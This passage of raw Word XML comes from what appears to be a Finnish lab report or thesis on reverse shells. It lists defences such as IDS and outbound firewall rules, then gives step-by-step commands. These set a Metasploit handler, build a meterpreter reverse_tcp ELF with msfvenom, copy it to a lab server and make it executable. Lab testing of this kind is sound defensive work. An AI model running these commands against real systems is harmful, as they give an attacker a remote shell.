        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="258C080C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>IDS voi havaita haitallisen liikenteen, ja myös estää ne reaaliajassa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="258C080C" w:rsidP="261F289F" w:rsidRDefault="258C080C" w14:paraId="028F2298" w14:textId="51C2A759">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="258C080C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Tunnistus perustuu liikenteen poikkeavuuksiin tai tunnettuun allekirjoituspohjaiseen tunnistamiseen (signature).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="258C080C" w:rsidP="261F289F" w:rsidRDefault="258C080C" w14:paraId="4E17B63F" w14:textId="1F534C48">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="258C080C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Käyttäytymisen analyysi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="258C080C" w:rsidP="261F289F" w:rsidRDefault="258C080C" w14:paraId="0E3C34F8" w14:textId="4422FAB4">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="258C080C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Monitoroimalla sovelluksia ja palveluita, jotka käyttävät paljon oikeuksia, esimerkiksi ohjelmien suorittamista (execute), jotka avaavat yhteyksiä sisäverkosta ulospäin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="258C080C" w:rsidP="261F289F" w:rsidRDefault="258C080C" w14:paraId="406A7F48" w14:textId="54C1B53B">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="258C080C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Phishing-hyökkäys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="258C080C" w:rsidP="261F289F" w:rsidRDefault="258C080C" w14:paraId="5E3B4594" w14:textId="2CAB8D11">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="258C080C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Haittaohjelmat, joiden avulla reverse shell yhteys saadaan aikaiseksi, voidaan toimittaa phishingin kautta. Näiden tunnistaminen on tärkeä osa suojautumista.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="258C080C" w:rsidP="261F289F" w:rsidRDefault="258C080C" w14:paraId="55447294" w14:textId="0DDCFA1A">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="258C080C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Tiedonsiirron valvonta</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="258C080C" w:rsidP="261F289F" w:rsidRDefault="258C080C" w14:paraId="36996740" w14:textId="02AB46CC">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="258C080C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Palomuurit voivat estää (normaalisti estää) ulospäin suuntautuvat yhteyksiä, joita reverse shell käyttää.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="258C080C" w:rsidP="261F289F" w:rsidRDefault="258C080C" w14:paraId="0F035744" w14:textId="7A8F9566">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="258C080C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Hyökkääjän IP-osoitetta voi tarkastella whitelist- ja blacklist-käytännöillä.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="258C080C" w:rsidP="261F289F" w:rsidRDefault="258C080C" w14:paraId="081752BC" w14:textId="248EEE9B">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="480" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="258C080C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(Amit Sheps. 2023.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8650A" w:rsidP="00B8650A" w:rsidRDefault="00B8650A" w14:paraId="0AC75CB0" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00B8650A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="107196D9" wp14:editId="200F1544">
            <wp:extent cx="5725071" cy="2562045"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="853915148"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15148" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, ohjelmisto&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5739842" cy="2568655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00795E0A" w:rsidP="00B8650A" w:rsidRDefault="00B8650A" w14:paraId="238462A6" w14:textId="52E93C49">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971528" w:id="43"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="005915C2">
        <w:t>Reverse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w:rsidRPr="00997DBA" w:rsidR="00997DBA" w:rsidP="00997DBA" w:rsidRDefault="00997DBA" w14:paraId="5477F027" w14:textId="0ED34782">
      <w:r>
        <w:t>Vielä erilliset ohjeet tes</w:t>
      </w:r>
      <w:r w:rsidR="00582BE1">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>aukseen:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8650A" w:rsidP="672D5F12" w:rsidRDefault="52EB87D8" w14:paraId="728AD891" w14:textId="5D3EE707">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Avaa Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8650A" w:rsidP="672D5F12" w:rsidRDefault="52EB87D8" w14:paraId="6E61D850" w14:textId="21F1B0DC">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8650A" w:rsidP="672D5F12" w:rsidRDefault="52EB87D8" w14:paraId="2355897D" w14:textId="4032A52F">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Valitse Metasploit handler -moduuli:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8650A" w:rsidP="672D5F12" w:rsidRDefault="52EB87D8" w14:paraId="2184215F" w14:textId="5CEE989B">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8650A" w:rsidP="672D5F12" w:rsidRDefault="52EB87D8" w14:paraId="417BD936" w14:textId="7592C0D5">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Valitse Payload Metasploitissa:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8650A" w:rsidP="672D5F12" w:rsidRDefault="52EB87D8" w14:paraId="06490F09" w14:textId="2BEAEDD3">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>set payload linux/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8650A" w:rsidP="672D5F12" w:rsidRDefault="52EB87D8" w14:paraId="522E3655" w14:textId="56321BBC">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Määritä hyökkääjän IP-osoite (LHOST), portti (LPORT) ja käynnistä:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8650A" w:rsidP="672D5F12" w:rsidRDefault="52EB87D8" w14:paraId="671CF4E9" w14:textId="4BA2070B">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">set LHOST 10.2.0.13  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8650A" w:rsidP="672D5F12" w:rsidRDefault="52EB87D8" w14:paraId="4BB603A4" w14:textId="6C67D7B5">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">set LPORT 4444  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8650A" w:rsidP="672D5F12" w:rsidRDefault="52EB87D8" w14:paraId="178DF1FA" w14:textId="39722383">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8650A" w:rsidP="672D5F12" w:rsidRDefault="52EB87D8" w14:paraId="18F22122" w14:textId="4587C0ED">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Luo Payload, jonka avulla saadaan yhteys NS1 -&gt; Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8650A" w:rsidP="672D5F12" w:rsidRDefault="52EB87D8" w14:paraId="301EF987" w14:textId="3FBA631E">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.2.0.13 LPORT=4444 -f elf &gt; reverse_shell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8650A" w:rsidP="672D5F12" w:rsidRDefault="52EB87D8" w14:paraId="56FC0BFF" w14:textId="3DCBE353">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Siirrä (scp) Payload Kali -&gt; NS1:  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8650A" w:rsidP="672D5F12" w:rsidRDefault="52EB87D8" w14:paraId="5030B79A" w14:textId="216E83E8">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">scp reverse_shell.elf </w:t>
      </w:r>
      <w:hyperlink r:id="rId26">
        <w:r w:rsidRPr="672D5F12">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>root@10.4.0.10:/tmp/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B8650A" w:rsidP="672D5F12" w:rsidRDefault="52EB87D8" w14:paraId="17FE36A8" w14:textId="5463C04A">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Kirjaudu NS1:een SSH:lla, aseta suoritusoikeudet ELF-tiedostolle ja suorita reverse_shell.elf:  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8650A" w:rsidP="672D5F12" w:rsidRDefault="52EB87D8" w14:paraId="3F0F4D39" w14:textId="4110EB0A">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh </w:t>
      </w:r>
      <w:hyperlink r:id="rId27">
        <w:r w:rsidRPr="672D5F12">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>root@10.4.0.10</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8650A" w:rsidP="672D5F12" w:rsidRDefault="52EB87D8" w14:paraId="55D7465C" w14:textId="5FAD03D0">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x /tmp/reverse_shell.elf  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8650A" w:rsidP="672D5F12" w:rsidRDefault="52EB87D8" w14:paraId="6F187519" w14:textId="6AE89E6B">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
